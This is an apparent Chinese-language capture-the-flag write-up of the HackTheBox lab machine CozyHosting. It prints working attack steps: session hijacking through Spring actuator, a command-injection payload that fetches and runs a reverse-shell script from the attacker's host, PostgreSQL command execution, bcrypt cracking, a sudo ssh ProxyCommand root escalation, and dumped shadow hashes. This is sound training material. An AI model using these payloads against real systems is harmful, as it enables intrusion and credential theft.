User
Nmap
┌──(root💀kali)-[~]
└─# nmap -sCV -p- -T4 10.10.11.230
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-02 23:13 EDT
Nmap scan report for 10.10.11.230
Host is up (0.18s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 663.02 seconds
┌──(root💀kali)-[~]
└─# vim /etc/hosts
┌──(root💀kali)-[~]
└─# tail -n 1/etc/hosts
10.10.11.230 cozyhosting.htb
添加hosts文件
dirsearch
┌──(root💀kali)-[~]
└─# dirsearch -u http://cozyhosting.htb/ -e *
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: 2023AntCTF | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /root/.dirsearch/reports/cozyhosting.htb/-_23-09-03_00-03-38.txt
Error Log: /root/.dirsearch/logs/errors-23-09-03_00-03-38.log
Target: http://cozyhosting.htb/
[00:03:39] Starting:
[00:04:36] 200 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[00:04:54] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:04:59] 400 - 435B - /a%5c.aspx
[00:05:03] 200 - 634B - /actuator
[00:05:03] 200 - 5KB - /actuator/env
[00:05:04] 200 - 491B - /actuator/sessions
[00:05:04] 200 - 10KB - /actuator/mappings
[00:05:04] 200 - 124KB - /actuator/beans
[00:05:05] 200 - 15B - /actuator/health
[00:05:06] 401 - 97B - /admin
[00:06:20] 200 - 0B - /engine/classes/swfupload//swfupload.swf
[00:06:20] 200 - 0B - /engine/classes/swfupload//swfupload_f9.swf
[00:06:21] 500 - 73B - /error
[00:06:23] 200 - 0B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[00:06:24] 200 - 0B - /extjs/resources//charts.swf
[00:06:35] 200 - 0B - /html/js/misc/swfupload//swfupload.swf
[00:06:40] 200 - 12KB - /index
[00:06:54] 200 - 4KB - /login
[00:06:56] 200 - 0B - /login.wdm%2e
[00:06:57] 204 - 0B - /logout
[00:07:49] 400 - 435B - /servlet/%C0%AE%C0%AE%C0%AF
Task Completed
扫出来actuator ,估计就是spring 的后端了,- -好像hvv
sessions 路由
image.png
{"7C923705DC41E61F208F884C9805BC62":"kanderson","AA2A1070790E1763E151787985056C0F":"UNAUTHORIZED","5DE00C9CFCA66C41B19981C5D42C50E3":"UNAUTHORIZED","F0F29E7C3878F0FFE9B04832DDCE7B82":"admin","C5DBD5957CEF28CA7D3C9B6FB720B903":"UNAUTHORIZED","47A5DDA1275C3F7A737169C2351950F1":"UNAUTHORIZED","B1BEAEE50493C63D8CD608EDAE5E8EC6":"UNAUTHORIZED","A71AEF86230669736013CAFEFF8EC720":"UNAUTHORIZED","D57F20FDBD896308C1AF0F1DC5207362":"UNAUTHORIZED","709E6B96390700BFEDDCC946C0358538":"kanderson"}
看了一下格式就是,前面是sessions的值,如果后面不是UNAUTHORIZED,就表示这个session是有效的
| username | sessions |
|---|---|
| kanderson | 7C923705DC41E61F208F884C9805BC62 |
| admin | F0F29E7C3878F0FFE9B04832DDCE7B82 |
| kanderson | 709E6B96390700BFEDDCC946C0358538 |
image.png
拦截一个请求,把session替换成 kanderson 看看效果
image.png
RCE
image.png
image.png
成功收到了请求
请求成功
反弹shell
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# cat 1@1
bash -c "bash -i>& /dev/tcp/10.10.16.8/5555 0>&1"
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.230 - - [03/Sep/2023 01:15:32] "GET /1 HTTP/1.1" 200 -
10.10.11.230 - - [03/Sep/2023 01:15:44] code 404, message File not found
10.10.11.230 - - [03/Sep/2023 01:15:44] "GET /1@a HTTP/1.1" 404 -
10.10.11.230 - - [03/Sep/2023 01:17:21] "GET /1 HTTP/1.1" 200 -
10.10.11.230 - - [03/Sep/2023 01:17:44] "GET /1 HTTP/1.1" 200 -
POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 59
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cozyhosting.htb/admin?error=Invalid%20hostname!
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AFECAAC1BC4B3E43937EAA0E5CE83F9C
Connection: close
host=1&username=kanderson||curl$IFS$9http://10.10.16.8/1|sh
HTTP/1.1 302
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 03 Sep 2023 05:17:21 GMT
Content-Length: 0
Location: http://cozyhosting.htb/admin?error=ssh: Could not resolve hostname kanderson: Temporary failure in name resolution/bin/bash: line 1: sh@1: command not found % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0100 50 100 50 0 0 151 0 --:--:-- --:--:-- --:--:-- 151curl: (23) Failed writing body
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
这里这样发包,发现 sh@1,也就是会把host的内容拼接到 username 后面去,然后再执行,我们有什么办法让后面的内容不影响我们想要执行的命令呢?curl$IFS$9http://10.10.16.8/1|sh
答案就是再加%0a
POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cozyhosting.htb/admin?error=Invalid%20hostname!
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=AFECAAC1BC4B3E43937EAA0E5CE83F9C
Connection: close
host=1&username=kanderson||curl$IFS$9http://10.10.16.8/1|sh%0a
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# nc -lvnp 5555 1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
ls
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:46926.
bash: cannot set terminal process group (1061): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$ ls
ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$
成功反弹shell
image.png
下载 jar包
image.png
利用nc 把这个 jar包传出来看看
2028 cp clouhosting-0.0.1.jar clouhosting-0.0.1.zip
2029 unzip clouhosting-0.0.1.
2030 unzip clouhosting-0.0.1.zip
2032 mkdir cloud
2033 mv BOOT-INF org META-INF cloud
2035 cd cloud
2036 ls
2037 grep "pass" ./ -r
2038 grep "password" ./ -r
2039 grep "username" ./ -r
把拿到的jar包转为zip,搜索jar里面的铭感信息
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/CozyHosting/cloud]
└─# grep "password" ./ -r
grep: ./BOOT-INF/lib/spring-security-crypto-6.0.1.jar: binary file matches
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
grep: ./BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class: binary file matches
./BOOT-INF/classes/templates/login.html: <input type="password" name="password" class="form-control" id="yourPassword"
./BOOT-INF/classes/templates/login.html: <div class="invalid-feedback">Please enter your password!</div>
./BOOT-INF/classes/templates/login.html: <p th:if="${param.error}" class="text-center small">Invalid username or password</p>
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot: binary file matches
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-line"
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf: binary file matches
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/CozyHosting/cloud]
└─# grep "username" ./ -r
./BOOT-INF/classes/application.properties:spring.datasource.username=postgres
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class: binary file matches
./BOOT-INF/classes/templates/admin.html: <input name="username" class="form-control" id="username" placeholder="user">
./BOOT-INF/classes/templates/admin.html: <label for="username">Username</label>
./BOOT-INF/classes/templates/login.html: <input type="text" name="username" class="form-control" id="yourUsername"
./BOOT-INF/classes/templates/login.html: <div class="invalid-feedback">Please enter your username.</div>
./BOOT-INF/classes/templates/login.html: <p th:if="${param.error}" class="text-center small">Invalid username or password</p>
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/CozyHosting/cloud]
└─# cat ./BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
postgres 数据库
| spring.datasource.username | spring.datasource.password |
|---|---|
| postgres | Vg&nvzAQ7XxR |
app@cozyhosting:/app$ netstat -ntlp
netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 1061/java
image.png
frp 搭建代理进去看看
image.png
内网127.0.0.1:8000端口,其实就是起了一个web ,- -好吧 (后面感觉是其他用户起的web服务)
那我们现在有了postgre数据库的密码,我们可以连上去看看
image.png
navicat不知道为什么连不上- -,代理明明是好的 (后来发现是navicat版本太低)
那就去shell里面用命令行吧
命令行连接
app@cozyhosting:/tmp$ psql -h localhost -p 5432 -U postgres -d cozyhosting
psql -h localhost -p 5432 -U postgres -d cozyhosting
Password for user postgres: Vg&nvzAQ7XxR
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
cozyhosting=#
cozyhosting=# help
help
You are using psql, the command-line interface to PostgreSQL.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help with psql commands
\g or terminate with semicolon to execute query
\q to quit
cozyhosting=# \l
\l
WARNING: terminal is not fully functional
Press RETURN to continue
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privil
eges
-------------+----------+----------+-------------+-------------+----------------
-------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
(4 rows)
(END)
(END)
(END)q
cozyhosting=#
cozyhosting=# \l
\l
WARNING: terminal is not fully functional
Press RETURN to continue
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privil
eges
-------------+----------+----------+-------------+-------------+----------------
-------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
(4 rows)
(END)
(END)q
cozyhosting=#
cozyhosting=# \c cozyhosting
\c cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \conninfo
\conninfo
You are connected to database "cozyhosting" as user "postgres" on host "localhost" (address "127.0.0.1") at port "5432".
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
cozyhosting=# \dt
\dt
WARNING: terminal is not fully functional
Press RETURN to continue
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)
(END)
(END)q
cozyhosting=#
cozyhosting=# select * from users;
select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue
name | password | role
-----------+--------------------------------------------------------------+-----
--
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)
(END)
(END)q
cozyhosting=#
cozyhosting=# select * from hosts;
select * from hosts;
WARNING: terminal is not fully functional
Press RETURN to continue
id | username | hostname
----+-----------+--------------------
1 | kanderson | suspicious mcnulty
5 | kanderson | boring mahavira
6 | kanderson | stoic varahamihira
7 | kanderson | awesome lalande
(4 rows)
(END)q
postgres 执行命令
postgre是可以执行系统命令
Refer:https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#rce
image.png
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
cozyhosting=# copy (SELECT '') to program 'id'
copy (SELECT '') to program 'id'
cozyhosting-# DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;DROP TABLE IF EXISTS cmd_exec;
ERROR: syntax error at or near "DROP"
LINE 2: DROP TABLE IF EXISTS cmd_exec;
^
cozyhosting=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
cozyhosting=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
cozyhosting=# SELECT * FROM cmd_exec;
WARNING: terminal is not fully functional
Press RETURN to continue
cmd_output
------------------------------------------------------------------------
uid=114(postgres) gid=120(postgres) groups=120(postgres),119(ssl-cert)
(1 row)
...skipping...
cmd_output
------------------------------------------------------------------------
uid=114(postgres) gid=120(postgres) groups=120(postgres),119(ssl-cert)
(1 row)
~
IF: No such file or directory (press RETURN)q
cmd_exec: No such file or directory (press RETURN)
再反弹一个postgre 权限的shell
postgre ReverseShell
image.png
看了一圈 好像也没什么用,
frp 代理
image.png
内网还有一个 8080 的服务
image.png
好家伙,应该只是nginx转发,外网80转到内网这个8080,其实就是一个服务
峰回路转-爆破hash
看了一圈,感觉也就只有 数据库里面的admin密码不知道,需要爆破 ,
kanderson 的密码 jar 包里面已经读取到了 ,使用 idea 反编译代码可以知道
image.png
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
这个hash,我不知道什么类型,使用 john 跑了一会知道了是 **bcrypt [Blowfish 32/64 X3]**
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# john hash2 /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-75.txt 130 ⨯ 1 ⚙
Warning: only loading hashes of type "bcrypt", but also saw type "tripcode"
Use the "--format=tripcode" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "bcrypt", but also saw type "pix-md5"
Use the "--format=pix-md5" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
0g 0:00:00:04 0.43% 2/3 (ETA: 05:44:07) 0g/s 169.8p/s 169.8c/s 169.8C/s yellow..butter
0g 0:00:00:06 0.61% 2/3 (ETA: 05:45:04) 0g/s 173.0p/s 173.0c/s 173.0C/s stinky..88888888
0g 0:00:00:08 0.78% 2/3 (ETA: 05:45:35) 0g/s 173.4p/s 173.4c/s 173.4C/s grumpy..jimbob
0g 0:00:00:12 1.15% 2/3 (ETA: 05:45:59) 0g/s 174.0p/s 174.0c/s 174.0C/s 333333..iverson
0g 0:00:00:17 1.56% 2/3 (ETA: 05:46:43) 0g/s 174.1p/s 174.1c/s 174.1C/s jump..otter
Proceeding with incremental:ASCII
0g 0:00:18:55 3/3 0g/s 162.4p/s 162.4c/s 162.4C/s bonnn..boshu
0g 0:00:21:50 3/3 0g/s 160.2p/s 160.2c/s 160.2C/s 140912..143622
0g 0:00:21:51 3/3 0g/s 160.2p/s 160.2c/s 160.2C/s 142293..150311
0g 0:00:21:52 3/3 0g/s 160.2p/s 160.2c/s 160.2C/s 151721..153365
Session aborted
image.png
跑了一个多小时,还是没跑出来,换成hashcat
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/CozyHosting]
└─# hashcat -m 3200 -a 0 hash2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10300H CPU @ 2.50GHz, 2918/5900 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sun Sep 3 05:51:43 2023 (20 secs)
Time.Estimated...: Tue Sep 5 07:38:20 2023 (2 days, 1 hour)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 80 H/s (6.77ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 1472/14344385 (0.01%)
Rejected.........: 0/1472 (0.00%)
Restore.Point....: 1472/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:640-648
Candidate.Engine.: Device Generator
Candidates.#1....: maurice -> mexico1
Hardware.Mon.#1..: Util: 64%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sun Sep 3 05:51:43 2023 (20 secs)
Time.Estimated...: Tue Sep 5 07:38:20 2023 (2 days, 1 hour)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 80 H/s (6.67ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 1472/14344385 (0.01%)
Rejected.........: 0/1472 (0.00%)
Restore.Point....: 1472/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:688-696
Candidate.Engine.: Device Generator
Candidates.#1....: maurice -> mexico1
Hardware.Mon.#1..: Util: 73%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
s^?^?
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sun Sep 3 05:51:43 2023 (35 secs)
Time.Estimated...: Tue Sep 5 21:17:40 2023 (2 days, 15 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 63 H/s (7.89ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 1536/14344385 (0.01%)
Rejected.........: 0/1536 (0.00%)
Restore.Point....: 1536/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: clover -> dragon1
Hardware.Mon.#1..: Util: 2%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sun Sep 3 05:51:43 2023 (35 secs)
Time.Estimated...: Tue Sep 5 21:17:40 2023 (2 days, 15 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 63 H/s (7.89ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 1536/14344385 (0.01%)
Rejected.........: 0/1536 (0.00%)
Restore.Point....: 1536/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: clover -> dragon1
Hardware.Mon.#1..: Util: 7%
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sun Sep 3 05:51:43 2023 (48 secs)
Time.Estimated...: Sun Sep 3 05:52:31 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 60 H/s (5.03ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344385 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2752/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: bebito -> medicina
Hardware.Mon.#1..: Util: 71%
Started: Sun Sep 3 05:50:20 2023
Stopped: Sun Sep 3 05:52:32 2023
没到3分钟,跑出来了- -
manchesterunited
**ssh 连接 **
image.png
root
Refer: https://gtfobins.github.io/gtfobins/ssh/#sudo
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
josh@cozyhosting:~$ sudo /usr/bin/ssh ;bash -i
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
[-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
[-i identity_file] [-J [user@]host[:port]] [-L address]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-Q query_option] [-R address] [-S ctl_path] [-W host:port]
[-w local_tun[:remote_tun]] destination [command [argument ...]]
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
#
# cd /root
# ls
root.txt
# cat root.xt
cat: root.xt: No such file or directory
# cat root.xt
cat: root.xt: No such file or directory
# cat root.txt
太直接了- -吧这个提权,
root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2:19577:0:99999:7:::
josh:$y$j9T$QbN44OK6RyyP01EL9VkVU0$n/uszgmCRdbeaF9OiCVna63BwZCtG.SLHXEXVeluy.1:19498:0:99999:7:::
